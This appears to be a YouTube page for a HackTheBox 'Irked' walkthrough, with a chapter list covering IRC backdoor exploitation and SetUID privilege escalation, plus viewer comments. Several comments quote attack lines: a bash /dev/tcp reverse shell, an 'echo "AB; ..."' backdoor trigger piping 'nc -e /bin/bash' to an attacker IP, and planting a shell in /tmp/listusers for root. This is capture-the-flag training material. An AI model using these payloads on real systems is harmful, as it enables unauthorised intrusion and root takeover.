HackTheBox - Irked
ฝัง
- เผยแพร่เมื่อ 26 เม.ย. 2019
- Last video was missing about 2 minutes and cut off at 31:35. Sorry, was an extremely busy week and didn't get to verify everything was good.
00:39 - Begin on Recon
01:39 - Starting a full nmap scan
04:15 - Discovery of IRC
04:35 - Manually looking at IRC
06:00 - Looking at the IRC to understand how to connect to an IRC Server
07:00 - Pulling the IRC Version and discovering the exploit
08:50 - Going into the history of the IRC Backdoor
09:45 - Manually exploiting the IRC Server
13:10 - Shell returned on the server
14:30 - Discovery of .backup which gives a steg password
16:45 - Logging in with djmardov
21:20 - Discovery of SetUID enabled custom binary, viewuser
23:25 - Using ltrace to see what the binary does, executes the file /tmp/listusers
23:50 - Getting a root shell
25:50 - Testing exploiting the binary with "who", fails due to no setuid
27:50 - Looking at the binary within Ghidra
Always the highlight of my Saturday. Thanks for another solid post!
Thanks! Just finished watching the original video so great timing :P
Awesome breakthrough and explanation!
Thanks for the quality videos IppSec. Really like how clear you are with explaining the tools and methods you use. Just curious though, are you doing the boxes for the first time in your videos? Or are you solving them first, and the making the video?
Hell IppSec, I am following you for a month and you amaze me every time...
you know a lot of tools, paths, you are like a wiki in pen testing...
The question is are you doing a course somewhere ? are you planing to do?
Cheers
Nice content, keep it up
Thanks for doing beginner boxes as well as the difficult ones, I wonder why they included pass.txt in root?
Maybe something to look into for further exploration :)
I'm proud of myself that I know whats happening.
Too bad I lost some points 'cause this box got retired.
Me too. I'm a little pissed about that to be honest. It was a fine box and challenge, this one.
Glad to see that ippsec is still human and can forget the order of # and ! at a bash file (-; cheers
Thank you so much
Love your videos, you rock! I'm curious too why the file being 2018 means it is interesting? I ran find / -perm -4000 2&>dev/null to get there, but didn't see why that one stood out versus any of the others. Thanks and keep up the great work!
This box was retired April 2019 -- Generally boxes retire after 4-6 months, so it being created in 2018 meant it was created around the time the box was released.
Is there a specific reason you're using ncat instead of nc? I know ncat is the nmap version and that the netcat openbsd version doesn't support the -e option but was wondering if there was a specific reason to use ncat instead of nc in this case. Maybe i missed something. Just curious. This was my first box ever on HTB and of course just like you said, I used MSF LOL! The manual way is awesome. Thanks for doing these videos. Keep up the great work!
Both are the same on Kali I believe, no reason just what my mind went to
Oh so this is how you were supposed to own the user, I got to root first via suid and just read it afterwards
at 4:48 when you run nmap -sC -sV -p 8067 10.10.10.117 it returns the results displayed there, however, when I run mine - it takes a while for it to display any information and it doesnt display anything of value or even close to resemble yours. It says "Unable to open connection". However, I am connected to the server and HTB. Any idea as to why that is happening?
Lol, I love that apple
hello sir, thanks for such informative videos , i have a question i'm bit confused about services running on 139,445 can you suggest some machine where you exploited them , thanks once again.
What's the difference between bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 and bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'? Why the last one works instead of the first?
I don't understand the motivation about symbolik link
ty
Maybe it is a little too late, but for the /usr/bin/viewuser, when you try to exploit that " who" command, I modified like this:
/bin/bash -p
then it returned root, I also learned this from you :D
at 10.25, what this command represents - echo "AB; ping -c 1 10.10.143.3" | ncat 10.10.10.117 8067 ?
So i done something different... i created a reverse shell and placed it in /tmp/listusers... so when that listuser was ran by DJ account i got a connection back to my self as root..
@IppSec at 22:15, how can we copy the binary without using base64 technique? can we copy it directly using nc or python? you mentioned that you don't remember the user's password, that's why you're bas63 encoding it. Didn't quite get you.
i didnt either
Love your video as usual. Just one question I wanna drop here.. When I run echo "A; nc -e /bin/bash my IP 4444" | nc 10.10.10.117 8067 I am not able to receive a reverse shell and the only difference between your command and my command is just you using "echo "AB and me using "echo "A. Why would it make such a huge difference in result not being able to grab the shell?
The backdoor is specifically looking for AB.
Thanks for your answer Ippsec!
@@JiyongShinful @ippsec why specifically looking for the AB
at 12. 43, any idea why it required to upgrade it to proper ttl ?
Hello IppSec,
At 12:20, I don't understand what is the difference between "bash -i ...." and "bash -c 'bash -i ....'".
Why reverse shell doesn't work for the first command but works for the second one ?
Can you explain this point please ?
Regards,
Yess, I am also wondering this myself. Not easy to search for this
now here's the catch how the view file in suid is interesting and it's not a default file in debian i checked. But if we will go quickly overview how you went there that some juicy stuff is there in suid and that file is interesting.
Just want to know the approch.
Why do you just use nmap instead of masscan on boxes? I find doing masscan initially finds more ports faster for a specific nmap port scan later.
Masscan can miss things
Awesome, thanks for the reply! Still learning a lot and your videos are my go to if I can't figure something out.
viewuser is running sh /tmp/listusers, so what i did is just add a a reverse shell to it and rooted. echo "reverseshell" > /tmp/listusers | chmod +x /tmp/listusers | viewuser Because i think the system clears /tmp after a period of dk how long
24:02 And I thought I was the only one always confused about it😂
Anyone knows what is the AB for in echo "AB; ?
why can't I view the website and how fast do you scan nmap?
Can you please make separate videos on RE .... I'm really week on that... Please make videos
+1
You could follow LiverOverflow he has already made some really good videos starting from basic tutorials on RE. Ippsec is great with HTB no doubt!
@@jigerjain yeah I was going through the binary explaination series .... No doubt for ippsec.... He is awesome .....
How are you entering copy mode and selecting the text and then saving to buffer? Please point me to the right place because the documentation is confusing as hell for us mortals..
You mean in tmux? That would be 'C-b [' (or 'C-a [' in case you still have the default) to enter copy mode, then you move to the text you want, 'v' to start selecting, and 'y' to yank!
Bash interpreter drops SUID permissions, since the script is owned by root, using #!/bin/dash should get a root shell with "who", didn't try this box so could be wrong, if you try it afterwards let me known if it worked
I also use Netcat but I never use that type of functionality that you use. I mean How it works when you type User Pass in the netcat session. What does this functionality called in netcat? Anyone?
Why is ghidra is better than cutter
Cutter is just a UI for radare2.
Don't get me wrong, I love radare2 and use it 90% of the time in its CLI version.
But the devs of Cutter even said it was purpose built to be a beginner's intro to radare2 and not a full fledged tool to compete with binja, IDE, Ghidra, etc.
First